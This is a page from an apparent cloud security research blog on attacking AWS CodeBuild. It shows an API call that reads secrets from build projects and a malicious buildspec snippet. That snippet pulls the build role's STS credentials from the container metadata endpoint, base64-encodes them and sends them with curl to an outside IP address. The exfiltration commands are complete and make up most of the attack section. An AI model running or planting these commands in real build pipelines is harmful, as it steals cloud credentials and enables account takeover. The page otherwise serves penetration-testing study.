Researchs
  • About Me
  • Bypassing DEP - Increasing the Gap
  • Hijacking Cloud CI/CD Systems for Fun and Profit
  • Found some Access Keys?
  • AWS Cloud Security
    • AWS Cloud Researchs
      • AWS and the Secrets Exposed on Public ECR Repository
    • Hacking API Gateway
      • API Gateway - Security
      • API Gateway API Calls
    • Hacking S3
      • S3 - Security
      • S3 API Calls
    • Hacking Cognito
      • Cognito - Security
      • Cognito - API Calls
    • Hacking Lamda
      • Lambda - Security
      • Lambda - API Calls
    • Hacking Cloudbuild
      • Cloudbuild - Security
      • Cloudbuild - API Calls
    • AWS Services
  • Windows Security Research
    • Exploit Development
      • RTCore64.sys - CVE-2019-16098
      • Mouse Server
      • mskssrv.sys - CVE-2023–29360
    • Fuzzing
      • WTF
  • Supply Chain Research
    • Abusing Netlify Functions
  • Reverse Engineering
    • Reversing.kr
      • Easy_CrackMe
      • Easy KeyGen
  • Failed Research Attempts
    • Github Actions - Cloud
    • CloudTrail
Powered by GitBook
On this page
  • Security
  • Senario I - Secrets
  • Senario II - Stealing STS Tokens
  1. AWS Cloud Security
  2. Hacking Cloudbuild

Cloudbuild - Security

PreviousHacking CloudbuildNextCloudbuild - API Calls

Last updated 1 year ago

Security

We will discuss some of interesting security implications on CodeBuild.

Senario I - Secrets

Many times, you might find secrets in environment variables or buildspec.yml in CodeBuild. In order to view those, you need to know Project Name and then make the API call :-

Here we assumed project name to be securitylabs-article .

aws codebuild batch-get-projects --names securitylabs-articles  --region us-east-2

API call ouputs the buildspec.yml and the configured environment variables in the project.

Senario II - Stealing STS Tokens

A malicious build-spec.yml can be used to steal the STS tokens of the CodeBuild's attached role.

The below commands can be added in the buildspec to exfilterate the CodeBuild's STS credentials

curl -qL -o aws_credentials.json http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI > aws_credentials.json
aws configure set region 'ap-south-1'
aws configure set aws_access_key_id `jq -r '.AccessKeyId' aws_credentials.json`
aws configure set aws_secret_access_key `jq -r '.SecretAccessKey' aws_credentials.json`
aws configure set aws_session_token `jq -r '.Token' aws_credentials.json`
encoded=$(cat ~/.aws/credentials | base64 -w 0)
curl "http://18.189.180.144:8000/&stuff=$encoded"

The first curl request to 169.254.170.2 returns STS credentials. Endpoint $_AWS_CONTAINER_CREDENTIALS_RELATIVE_URI contains the credentials path in format of /v2/credentials/<build_id> and since build-id is dynamic and not easy to guess, we would use the global environment variable to fetch the credential path.

Once the STS tokens are saved in aws_credentials.json file, we need to configure aws with the extracted credentials and finally ~/.aws/credentials can be base64 encoded and passed to our 18.189.180.144 server to exfilterate STS tokens.

Below screenshot indicates the base64 encoded credentials which were exfilterated out of codebuild.